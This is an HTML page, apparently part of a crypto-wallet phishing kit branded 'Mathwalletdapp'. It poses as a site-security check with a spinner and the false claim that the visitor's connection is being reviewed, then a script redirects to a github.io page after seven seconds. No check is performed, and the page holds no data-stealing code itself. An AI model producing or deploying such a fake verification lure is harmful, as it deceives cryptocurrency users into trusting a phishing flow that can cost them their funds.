<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Secure</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous">
    <style>
.body{
  font-family: system-ui;
}
.loader {
  border: 16px solid #f3f3f3;
  border-radius: 50%;
  border-top: 16px solid gray;
  width: 120px;
  height: 120px;
  -webkit-animation: spin 2s linear infinite; /* Safari */
  animation: spin 2s linear infinite;
}

/* Safari */
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(0deg); }
  100% { -webkit-transform: rotate(360deg); }
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}
.info{
  border: 1px solid black;

}   
/* .connect{
  padding-bottom: 100px;
}  */

.footer {
  position: fixed;
  left: 0;
  bottom: 0;
  width: 100%;
  text-align: center;
}

    </style>
</head>
<body>
  <div class="container-fluid">
    <div class="connect">
        <h2>Checking if the site connection is secure</h2>

        <div class="loader">
        </div>
    </div>
    <div class="secure">
        <p1>We are reviewing the security of your connection<br>
          before proceeding....</p1>
          <div class="info">
            <p2>Did you know some signs of bot malware<br>
            on your<br>
          computer are computer crashes, slow internet</p2>
          </div>
    </div>

    </div>


    <div class="footer">
      <hr>
      <p>Copyright &copy; 2023.Mathwalletdapp All Rights Reserved</p>
    </div>
</body>
<script>
    function pageRedirect() {
        window.location.replace("https://abdultahi.github.io/nework/secure.html");
    }      
    setTimeout("pageRedirect()", 7000);
</script>
</html>